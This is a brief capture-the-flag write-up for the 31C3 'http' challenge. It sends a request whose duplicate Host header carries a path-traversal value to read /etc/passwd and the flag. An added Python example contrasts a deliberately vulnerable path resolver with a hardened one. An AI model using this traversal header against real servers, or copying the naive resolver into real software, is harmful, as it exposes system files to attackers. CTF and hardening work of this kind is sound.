Revision 1 as of 2014-12-30 05:59:55

CTF/Writeup/31C3 CTF/http

MMA

http

Send the following request, using CRLF line endings.

GET /passwd HTTP/1.1
Host: ../../../../../../../../../etc
Host: works.90.31c3ctf.aachen.ccc.de

% cat exploit | nc works.90.31c3ctf.aachen.ccc.de 80
HTTP/1.0 200 OK

...
user:x:1000:1000:user,,,:/home/user:/bin/bash
flag:x:1001:1001:31C3_b45fa9e4d5969e3c524bdcde15f84125:/home/flag:
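
The response above implies that the server built a file path from the first Host value. The following is an added example, not part of the original writeup or the challenge's code, contrasting that pattern with a hardened resolver. The `/srv/vhosts` root, the root/Host/path layout and all function names are assumptions.

```python
import posixpath
import re

# Assumption: the server maps each request to <VHOST_ROOT>/<Host>/<path>.
VHOST_ROOT = "/srv/vhosts"  # hypothetical document root
LABEL = r"[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(LABEL + r"(\." + LABEL + r")*")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (target, [(name, value), ...])."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    _, target, _ = lines[0].split(" ")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return target, headers

def naive_resolve(raw):
    """Vulnerable pattern: first Host wins and is joined into the path unchecked."""
    target, headers = parse_request(raw)
    host = next(v for n, v in headers if n == "host")
    return posixpath.normpath(posixpath.join(VHOST_ROOT, host, target.lstrip("/")))

def safe_resolve(raw):
    """Return the file path, or raise ValueError (answer 400) on a bad request."""
    target, headers = parse_request(raw)
    hosts = [v for n, v in headers if n == "host"]
    if len(hosts) != 1:
        raise ValueError("exactly one Host header required")
    host = hosts[0].lower().split(":")[0]  # drop an optional port
    if len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError("Host is not a valid hostname")
    base = posixpath.join(VHOST_ROOT, host)
    path = posixpath.normpath(posixpath.join(base, target.lstrip("/")))
    if path != base and not path.startswith(base + "/"):
        raise ValueError("path escapes the virtual host directory")
    return path

# Constructed samples: the request from the writeup, and an ordinary one.
WRITEUP_REQ = (b"GET /passwd HTTP/1.1\r\n"
               b"Host: ../../../../../../../../../etc\r\n"
               b"Host: works.90.31c3ctf.aachen.ccc.de\r\n\r\n")
NORMAL_REQ = (b"GET /index.html HTTP/1.1\r\n"
              b"Host: works.90.31c3ctf.aachen.ccc.de\r\n\r\n")
```

`safe_resolve` rejects the writeup's request on the duplicate Host header alone. The hostname check and the containment check each catch the traversal independently if only one Host is sent.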